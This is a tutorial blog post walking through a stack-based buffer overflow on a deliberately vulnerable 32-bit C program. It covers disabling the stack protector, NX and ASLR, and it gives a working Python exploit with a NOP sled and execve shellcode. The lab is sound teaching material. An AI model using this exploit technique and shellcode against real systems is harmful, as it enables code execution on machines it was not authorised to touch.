"Simple" Stack Based Buffer Overflow - tl;dr and walkthrough

"Simple" Stack Based Buffer Overflow

In stack-based buffer overflows, every environment is different. The exploit itself is the same as many others, but the environment is not, so this post documents what can go wrong. For clarity, this guide follows a LiveOverflow video in which he creates a buffer overflow exploit: https://www.youtube.com/watch?v=HSlhY4Uy8SA


tl;dr for the compiler and environment problems this guide covers:
  1. gcc needs flag -fno-stack-protector when compiling - Some compilers add stack protection to protect against buffer overflows - related error:
       *** stack smashing detected ***: <unknown> terminated
       Program received signal SIGABRT, Aborted.
       0xf7fd5079 in __kernel_vsyscall ()
  2. gcc needs flag -z execstack when compiling - Some compilers mark stack memory as non-executable, so you are unable to run shellcode that is loaded onto the stack - related error:
      Program received signal SIGSEGV, Segmentation fault.
      0xffffd29e in ?? ()
  3. Disable ASLR on Ubuntu 18.04.1 using echo 0 | sudo tee /proc/sys/kernel/randomize_va_space - Ubuntu 18.04.1 LTS has ASLR enabled by default, which randomizes the memory addresses where programs load their stacks, heaps, variables, etc.

Getting Started:

Tools Used:
  1. Ubuntu 18.04.1 LTS VM was used
  2. gdb
  3. gcc
  4. Python 2.7

In a buffer overflow, the main goal is to overwrite the return address on the stack frame with a new address that points to shellcode.

If you are new to understanding the stack, registers, or return addresses I suggest this YouTube video to get started: https://www.youtube.com/watch?v=5iQkR69H_1M

Walkthrough of C code:

Here's the C code we will be exploiting:
    #include <stdio.h>
    #include <string.h>

    int func(char buff[]){
        char buffer[64];
        printf("Address: %p\n", (void*)&buffer);
        strcpy(buffer, buff);
        printf("Buffer contents copied");
    }

    int main(int argc, char **argv){
        if (argc < 2){
            printf("Not enough args\n");
        }else{
            func(argv[1]);
        }
    }
Synopsis: if at least one argument is passed to the program, func() is called. It creates a 64-byte buffer and copies the argument into it. For debugging purposes, it also prints the buffer's memory address.

What makes this program exploitable is the strcpy() function. When this function is called, it copies bytes from the source into the buffer until it reaches the source's null terminator \0. It does not check whether it has reached the end of the buffer. A long enough argument is therefore written past the end of the buffer and over whatever sits next to it on the stack, including the saved return address.
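
To make the missing bounds check concrete, here is a small simulation, not the real libc routine. It is written for Python 3 (an assumption, since the post itself uses Python 2.7). A bytearray stands in for func()'s stack frame, and the 12-byte gap between the buffer and the return address, the starting return address, and the helper names are all illustrative choices. The gap matches the 76-byte offset found later in this walkthrough.

```python
# Simulation only: a bytearray stands in for func()'s stack frame.
BUFFER_SIZE = 64   # char buffer[64] from hello.c
GAP_SIZE = 12      # assumed bytes between the buffer and the return address
RET_SIZE = 4       # a 32-bit return address


def new_frame():
    """Build a fake frame: buffer, gap, return address, one spare byte."""
    frame = bytearray(BUFFER_SIZE + GAP_SIZE + RET_SIZE + 1)
    start = BUFFER_SIZE + GAP_SIZE
    # Made-up original return address, only for illustration.
    frame[start:start + RET_SIZE] = (0x565555F0).to_bytes(4, "little")
    return frame


def unsafe_strcpy(frame, src):
    """Copy src byte by byte until its NUL, never checking BUFFER_SIZE."""
    i = 0
    while src[i] != 0:
        frame[i] = src[i]
        i += 1
    frame[i] = 0  # strcpy copies the terminator too
    return frame


def return_address(frame):
    """Read the simulated return address back as a little-endian integer."""
    start = BUFFER_SIZE + GAP_SIZE
    return int.from_bytes(frame[start:start + RET_SIZE], "little")
```

A short argument such as b"hello\x00" leaves the simulated return address alone, while 76 filler bytes followed by b"TTTT\x00" replace it with 0x54545454.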

The fun begins:

The above code is in file hello.c. To start, I compiled the code in a bash terminal using:
  gcc -m32 -g -o hello hello.c
This compiles the code as a 32-bit binary with debugging symbols in case they're needed. If the file is not already executable, give yourself execute permissions:
  chmod 755 hello
To run the program, pass it one argument, for example:
  ./hello AAAA

Background on "ret" in assembly:

I found understanding 'ret' in assembly helped me better understand what is going on under the hood during the overflow. (Source: https://c9x.me/x86/html/file_module_x86_id_280.html)

Here's a synopsis: The stack pointer (esp) holds a memory address. The value stored at that address is itself another memory address (a pointer) that points to more executable instructions. This value is called the return address. In assembly, 'ret' pops the value (the return address) that esp points to and loads it into eip (the instruction pointer). That's how a function returns execution to its caller (in our case func() returns to main()).

In the case of a buffer overflow, if we can overwrite the value esp points to (the return address) before 'ret' is executed and replace it with a different address, we can use that to execute shellcode. In the picture above, our goal would be to overwrite 0xffffd2dc with our own value.
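
As a rough model of what 'ret' does on a 32-bit stack, the sketch below (Python 3, an assumption) pops a little-endian dword from a byte string that stands in for stack memory. STACK_BASE and the function name are hypothetical values chosen for illustration, not addresses from the real program.

```python
STACK_BASE = 0xFFFFD000  # hypothetical address of the first byte of `stack`


def ret(stack, esp):
    """Model x86 'ret': load the dword esp points to into eip, then esp += 4."""
    offset = esp - STACK_BASE
    eip = int.from_bytes(stack[offset:offset + 4], "little")
    return eip, esp + 4
```

If the four bytes esp points to have been overwritten with b"TTTT", the model returns 0x54545454 as the new eip, which is the situation the rest of this walkthrough creates on purpose.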

Source: Wikipedia
In the example above, Char c[12] represents the buffer. When adding content to the buffer with a function such as strcpy(), it could write past the buffer and begin overwriting important information on the stack like the return address as seen in the third image.

The payload in python:

The hello program we compiled takes 1 argument to execute. A Python script named payload.py is used to generate that argument.
Make sure to print 4 of each letter. Since each letter is represented by 8 bits, four letters make 32 bits. This is the width of a memory address in a 32-bit binary, which makes it easy to see later which letters ended up in which memory addresses. To run it with python2:
  python2 payload.py
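
The original script is not reproduced in the text, so the following is only a guess at an equivalent: a minimal generator for the four-of-each-letter alphabet string. The function name is made up, and the single-argument print call is written so it should behave the same under Python 2.7 and Python 3.

```python
import string


def alphabet_pattern(repeat=4):
    """Return AAAABBBB...ZZZZ: each uppercase letter repeated `repeat` times."""
    return "".join(letter * repeat for letter in string.ascii_uppercase)


if __name__ == "__main__":
    print(alphabet_pattern())
```

With four bytes per letter, every aligned 32-bit word on the stack holds a single repeated letter, so a value such as 0x41414141 maps straight back to AAAA.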

Finding the Return Address in the current stack frame:

To search for the ret address, we're going to use gdb (GNU Debugger). We'll use it to set a breakpoint on the ASM ret instruction we want to target and then see if our alphabet string overwrites the return address. We'll be targeting ret in the func() function. Launch gdb in the Ubuntu terminal:
  gdb ./hello
In gdb, to add the output of the python script as an argument to our program:
  run $(python2 payload.py)

   *** stack smashing detected ***: <unknown> terminated
   Program received signal SIGABRT, Aborted.
   0xf7fd5079 in __kernel_vsyscall ()
So what's this about? Well, the alphabet string managed to overflow the buffer and also trigger the first buffer overflow protection mechanism.

The gcc compiler on Ubuntu 18.04.1 adds a stack protector mechanism to detect buffer overflows. Here is a Stack Exchange post about it: https://security.stackexchange.com/questions/158609/how-is-the-stack-protection-enforced-in-a-binary

To get around this for learning purposes, recompile the program to disable the stack protector:
  gcc -m32 -g -o hello hello.c -fno-stack-protector
Now let's try to verify in gdb again:
  run $(python2 payload.py)

No stack smashing detected this time, so that's good. So now, let's switch gdb to the Intel assembly syntax:

  set disassembly-flavor intel
Disassemble the func() function. In gdb, type:
   disassemble func
In the output, gdb resolved references to strcpy, printf, and puts. We only care about the last line though:
  0x565555ce <+81>:         ret 
This is the return instruction we are going to abuse to have it execute our shellcode. Note: your address will likely look different than this one. Let's set a breakpoint on it. In gdb:
  b *0x565555ce
Run the program again using r $(python2 payload.py). Press y if gdb says the program being debugged has been started already. It should break on 0x565555ce.
Now examine the stack. In gdb:
   x/20wx $esp
  1. x is examine
  2. /20w is 20 words (each word is 4 bytes, so 80 bytes)
  3. the second x tells gdb to display the values in hexadecimal.
  4. $esp means starting at the stack pointer register
And we get this:

With the breakpoint on ret at 0x565555ce <+81> if we inspect the stack pointer (esp), we will see it pointing at the return address. Display the registers in gdb:

 info registers

Look at the esp register. Does it look familiar?
The esp register is pointing at 0xffffd26c. Since the next instruction is ret, that means 0xffffd26c is the piece of memory that stores our return address.

In gdb, type c to move past the breakpoint:
What happened? It looks like it tried to access memory address 0x54545454? But why?

When the ret instruction is processed, the esp register has an address in it. The address in esp points to the return address. The return address is loaded into eip to redirect program flow back to the caller function, in our case main(). When we examined the memory esp points to (x/20wx $esp in gdb) we saw the value 0x54545454. This value is the overwritten return address. When we continued execution, ret loaded the instruction pointer with 0x54545454, which it treated as the return address. In this case though, it is not a valid address because we overwrote it, hence our error message.
If you pull up a hex to ASCII converter, you'll find that 0x54545454 is TTTT in ASCII. This means that, from our padding string, the letters TTTT overwrote the return address. So we can replace TTTT in our Python script with an address to point execution somewhere else in memory. But where? 🤔 We'll get to that in a second.
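
The hex-to-ASCII lookup and the resulting offset can also be worked out in a few lines. This is a sketch for Python 3 (an assumption), with made-up helper names, and it assumes the alphabet string has four of each uppercase letter as described earlier.

```python
import string
import struct


def faulting_bytes(eip):
    """Turn the faulting eip value back into the 4 characters that produced it."""
    # "<I" is little-endian, matching how x86 stores the dword in memory.
    return struct.pack("<I", eip).decode("ascii")


def offset_of(eip, repeat=4):
    """Find where those 4 characters first appear in the alphabet pattern."""
    pattern = "".join(c * repeat for c in string.ascii_uppercase)
    return pattern.find(faulting_bytes(eip))
```

For 0x54545454 this gives TTTT at offset 76, which means 76 bytes of padding (AAAA through SSSS) sit in front of the return address.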

So back to our python script:
With this knowledge, our padding will be everything up to TTTT in the alphabet string. Now we can just replace TTTT with an address of our choice to redirect program flow.

Now what return address should replace TTTT in our string?
  • Option 1: Point it at the next address (0xffffd270) and immediately append our shellcode so it takes up that space
  • Option 2: Point it at an offset from 0xffffd26c so it will move to a position relative to where ESP was pointing, and use a NOP sled to reach the shellcode
Option 2 is the better choice since we don't want to hardcode exact addresses in our exploit; we just want to store offsets from other memory addresses. Something as simple as different environment variables on other machines can cause the address space not to line up properly.

Even though we are still technically hardcoding the 0xffffd26c address, we can make use of a technique called a NOP sled to help get to the shellcode. This way, even if our return address is off by a couple of addresses or even a couple hundred, the NOP sled is able to correct for it.

To read up on NOP sleds, here's a Stack Overflow post: https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work/14760699#14760699
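
The idea behind the sled can be shown with a toy model instead of real machine code. In this Python 3 sketch (an assumption), a byte string holds 1000 NOP bytes followed by a single placeholder byte standing in for the first byte of shellcode. The sled length, the 0xCC placeholder, and the function name are all illustrative.

```python
NOP = 0x90
SLED_LENGTH = 1000          # illustrative size, not the one used in the exploit
PLACEHOLDER = b"\xcc"       # stands in for the first shellcode byte

memory = bytes([NOP]) * SLED_LENGTH + PLACEHOLDER


def slide(mem, start):
    """Step over NOP bytes from `start`; return the index of the first non-NOP."""
    pc = start
    while pc < len(mem) and mem[pc] == NOP:
        pc += 1
    return pc
```

Whether execution lands at index 0, 500, or 999, slide() ends up at index 1000, the start of the placeholder. That is why a return address that is only roughly right can still reach the shellcode.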

So in this case, we'll point our return address to 0xffffd26c+50. This means return to the address 50 bytes above 0xffffd26c. We can always tweak the offset per machine to 100 or 1000 if our exploit fails randomly.
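
The arithmetic and the byte order are easy to get wrong, so here is a quick check in Python 3 (an assumption). It uses the explicit little-endian format "<I". The plain "I" used elsewhere in this post means native byte order, which is also little-endian on x86. The constant names are made up.

```python
import struct

ESP_AT_RET = 0xFFFFD26C   # value of esp at the ret breakpoint in this walkthrough
OFFSET = 50               # decimal 50, which is 0x32

target = ESP_AT_RET + OFFSET
packed = struct.pack("<I", target)   # the 4 bytes that replace TTTT

print(hex(target))   # 0xffffd29e
print(packed)        # b'\x9e\xd2\xff\xff'
```

The least significant byte comes first in memory, so the address 0xffffd29e is written into the payload as 9e d2 ff ff.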

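Back to Python, here's what our exploit script will look like:
  import struct
  # Padding: four of each letter from A to S (76 bytes), just enough to reach the return address
  padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
  return_address = struct.pack("I", 0xffffd26c+50)
  nops = "\x90"*90000
  payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
  print padding+return_address+nops+payload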

Line by line explanation:

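In the padding string, we no longer need anything from TTTT onward. Having [A-S] in the string (19 letters x 4 = 76 bytes) is enough to reach the return address. The 4 bytes after SSSS will be our return address.
  padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
Now we import the struct module and use it to pack our return address plus the offset of 50 into 4 bytes.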
  import struct
  return_address = struct.pack("I", 0xffffd26c+50)
For NOPs, we're just going to make a ton of them. The hex code for a NOP is 0x90. The idea is that the more NOPs you have (not toooo many), the more likely the address we return to will land somewhere inside them.
   nops = "\x90"*90000
The shellcode we're going to use is from here: http://shell-storm.org/shellcode/files/shellcode-827.php
   payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
Shellcode here is a hex representation of x86 machine code. In this case, the shellcode calls execve on /bin//sh, which on Ubuntu points to /bin/dash, so when our code executes we'll have a new shell open in our terminal. Then we print it all out to send the output into our hello program:
   print padding+return_address+nops+payload
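
The script above relies on Python 2's byte strings. For anyone who only has Python 3, the following is an untested-against-the-binary sketch of the same layout using bytes objects. The function name and its parameters are hypothetical, and the default address and offset are simply the ones from this walkthrough, so they will likely need adjusting on another machine.

```python
import string
import struct

# Same 23-byte execve shellcode as in the post (from shell-storm).
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")


def build_payload(esp_at_ret=0xFFFFD26C, offset=50, nop_count=90000):
    """Return padding + return address + NOP sled + shellcode as bytes."""
    # Four of each letter A..S: 19 * 4 = 76 bytes up to the return address.
    padding = "".join(c * 4 for c in string.ascii_uppercase[:19]).encode("ascii")
    return_address = struct.pack("<I", esp_at_ret + offset)  # little-endian
    nops = b"\x90" * nop_count
    return padding + return_address + nops + SHELLCODE
```

Under Python 3 the result has to be written as raw bytes, for example with sys.stdout.buffer.write(build_payload()), because print() would emit the text form of the bytes object instead. The payload also must not contain a zero byte, since it is passed as a command-line argument.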

Running the Exploit:

Now when we run this script, it will replace the return address with 0xffffd26c+50, which is 0xffffd29e (50 decimal is 0x32). Then hopefully location 0xffffd29e will hold our NOPs, so execution slides down into our shellcode.

Go back into gdb:
  gdb ./hello
Place a breakpoint at our 'ret' again like last time:
  b *0x565555ce
Run ./hello with the payload:
  r $(python2 payload.py)
Now, we should have hit the breakpoint, let's view the memory again:
  x/30wx $esp
Look at all of those x90s! Those are our NOPs filling memory. If we managed to get our return address pointed to one we're golden. If we look at the memory again where the stack pointer is located, we see that the address loaded in esp changed.
You can see our return address 0xffffd26e+50, which equated to address 0xffffd28e.
Since we filled the code with 90000 NOPs, it's possible this will still work. This is why it is very important for us to use a big NOP sled if we can and an offset from an address that we can change easily without having to know the exact address we're jumping to. Keep in mind, in the real world NOP sleds are easily detectable.

This should still work in this case so let's continue off our breakpoint. Press c to continue in gdb:
  (gdb) c

  Program received signal SIGSEGV, Segmentation fault.
  0xffffd29e in ?? ()
My first thought when encountering this was that my NOPs weren't being hit, maybe because my offset was now incorrect after the stack changed locations.

But a quick examine with x/40wx $esp proves this wrong:
*NOTE: In between my last three screenshots I changed the offset in my python script slightly, so instead of address equaling 0xffffd28e, it now equals 0xffffd29e. This doesn't affect the outcome of anything though. Just trying to clear up possible confusion.

As we can see here, the return address+offset that we selected should work and it should perform no-operations until it hits the shellcode.

After digging, here's the reason for the segmentation fault: https://security.stackexchange.com/questions/72653/exploiting-buffer-overflow-leads-to-segfault

Basically, when the program was built, its stack was marked as non-executable memory, so if the CPU tries to execute instructions from inside the stack, the program faults. This is to help prevent stack-based buffer overflows.
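
On Linux this marking is recorded in the binary's PT_GNU_STACK program header, so it can be checked without running anything. The sketch below (Python 3, an assumption) reads that header from the raw bytes of a 32-bit little-endian ELF file such as the one gcc -m32 produces. The function name is made up and 64-bit files are deliberately not handled.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header type that carries the stack flags
PF_X = 0x1                  # "executable" bit in p_flags


def stack_is_executable(elf):
    """Return True/False from PT_GNU_STACK, or None if the header is absent."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF file")
    (e_phoff,) = struct.unpack_from("<I", elf, 28)        # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", elf, base)
        (p_flags,) = struct.unpack_from("<I", elf, base + 24)  # p_flags in Elf32_Phdr
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None
```

Something like stack_is_executable(open("hello", "rb").read()) should return False for the binary as compiled so far. The same information is shown by readelf -l ./hello on the GNU_STACK line, where the flags read RW for a non-executable stack and RWE for an executable one.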

To turn this feature off, add the -z execstack option to the gcc command and recompile the program:
   gcc -m32 -g -o hello hello.c -fno-stack-protector -z execstack
We shouldn't have to reload gdb after compiling. Back in gdb:
   r $(python2 payload.py)
Hit c to continue past the breakpoint aaaaaand~
What is this error?
   process 22411 is executing new program: /bin/bash
   Cannot insert breakpoint 1.
   Cannot access memory at address 0x565555ce
This is just an error in gdb itself. In fact, the shellcode and exploit worked. When the shellcode launched /bin/dash, gdb saw ./hello start a new program and followed it. Our breakpoint could not be inserted because that memory address doesn't exist in the new program, so the session stopped there.
Simple fix. Exit gdb with quit and relaunch. This time, don't set a breakpoint.
   r $(python2 payload.py)
Here's proof of code execution. The shellcode was hit and it launched /bin/dash in our gdb instance. This can be verified with whoami

Running the exploit outside of gdb

That's great and all, but the real test is running it outside of gdb, you know, on a live system like Ubuntu 18.04.1 LTS.

Open a new terminal:
   ./hello $(python2 payload.py)
What?? It just worked in gdb!
   Segmentation fault (core dumped)
I spent a lot of time looking into this. Checking the kernel logs helped a little bit:
   tail -n 4 /var/log/kern.log
According to the logs, the ip is using our return address as expected. But the stack pointer is all over the place. It's not consistent like it was in gdb. Hmmmm....

If we continue to run our program, look at the buffer address it's printing. It changes every time the program is run.

The buffer address wasn't changing like that in gdb though. Since it changes so much, the offset in the exploit can't be used at all. In fact, it's randomized so much that there's no way to know what to select as an offset. The question is, why are the stack pointer and the buffer address so random now?
After seeing both of these random quirks, I realized what was going on. The issue is caused by ASLR - Address Space Layout Randomization.
This is an operating system level feature that randomizes the layout of memory in programs. It doesn't affect programs run under gdb because gdb, by default, disables address randomization for the process it debugs (its disable-randomization setting). The last thing needed for the environment is to turn off ASLR using this:
   echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 
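
To confirm what the setting currently is before and after that command, the value in the same file can be read back. This is a small Python 3 sketch (an assumption) with made-up function names. The descriptions paraphrase the kernel's documented meanings for 0, 1, and 2.

```python
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base, and vDSO randomized",
    2: "full randomization (heap/brk included)",
}


def describe_aslr(raw):
    """Map the raw file contents (for example '2\\n') to a description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown")


def read_aslr(path=ASLR_PATH):
    """Read the current setting from procfs (Linux only)."""
    with open(path) as handle:
        return describe_aslr(handle.read())
```

Writing 0 with the tee command only lasts until the next reboot, so read_aslr() is a quick way to check whether the lab environment is still in the expected state.
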
Now let's try again:
And it works

This blog post is just meant to serve as a reminder of the protections modern computers have nowadays against buffer overflows, and of how to set up an environment if you plan on giving this a try yourself.

Thanks for reading

4/5/2022 Update: I see what people are querying when coming across this blog post, so I added the related errors to the TL;DR section to hopefully make it easier to digest and updated some grammar.